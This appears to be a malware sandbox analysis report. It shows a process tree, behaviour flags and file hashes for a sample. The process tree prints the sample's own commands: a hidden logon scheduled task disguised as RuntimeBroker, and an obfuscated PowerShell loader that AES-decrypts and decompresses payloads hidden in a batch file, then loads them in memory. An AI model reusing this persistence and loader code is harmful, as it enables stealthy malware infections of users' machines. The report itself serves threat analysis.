- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_25_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dyVGy+AK/alUx4C1KZGPyURnZpXePTKfrvzd88J4h2c='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EtptwhXr1MaRHHI/4/0emw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JxCCm=New-Object System.IO.MemoryStream(,$param_var); $fscLF=New-Object System.IO.MemoryStream; $beNoU=New-Object System.IO.Compression.GZipStream($JxCCm, [IO.Compression.CompressionMode]::Decompress); $beNoU.CopyTo($fscLF); $beNoU.Dispose(); $JxCCm.Dispose(); $fscLF.Dispose(); $fscLF.ToArray();}function execute_function($param_var,$param2_var){ $eJqYy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wnjdB=$eJqYy.EntryPoint; $wnjdB.Invoke($null, $param2_var);}$pMUKG = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_25.bat';$host.UI.RawUI.WindowTitle = $pMUKG;$hJjhE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pMUKG).Split([Environment]::NewLine);foreach ($cavJU in $hJjhE) { if ($cavJU.StartsWith('cypLHeqrkKMWSgQqffJU')) { $ycQqn=$cavJU.Substring(20); break; }}$payloads_var=[string[]]$ycQqn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3496
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2572
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD580b08b611f1f7ee7f1bba68444c29dd7
SHA122f60b429e49f8a3a260c87c0806a1cd4a970692
SHA25648ec3b10db2c486343a2154708b2fc08c01f2458d82b588dfdce3a97128790ac
SHA512ecca9e00c8252957c340b01ca6272fd958167f3b09494bd73330916e3f58b7389c1254e9f9304abefc5d1646f8ff8527ed70f3ce40cfd2e4dd2426ae67a68553
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.8MB
MD5f3281ed9a501fd2ff062664456bd3016
SHA14e41be0fe4bf26907eaa738fffaabf10651c15b5
SHA2563e27d2aee2a3f3a1f28e27100ed8b966ee82a85ec94d8d715f390d824e20abba
SHA512cbd41cc54655e2fc7159d4cf50c6b0424b7caf927016735bf1e84b1b69ff58cf12abcee724af99f2c0aba7e176393477c16cf183d99c48163d9b85f8e7aaf1b4
-
Filesize
123B
MD54f596628384c3249d77fe0f0dc8cb945
SHA170847ea80252ea857a283233662d20b49adb3aef
SHA25603f4d597f322ecab049e2f4bd538526a952878166c81ee0430e0858e0233ac23
SHA512d7877d9fb9990c48fd46736c9f3012c8632857ed91969fce0de71488c0f8ee2cb3873569a05fd75177010a90de90b560b4f4b2457b8d31f42b798a45f30f938b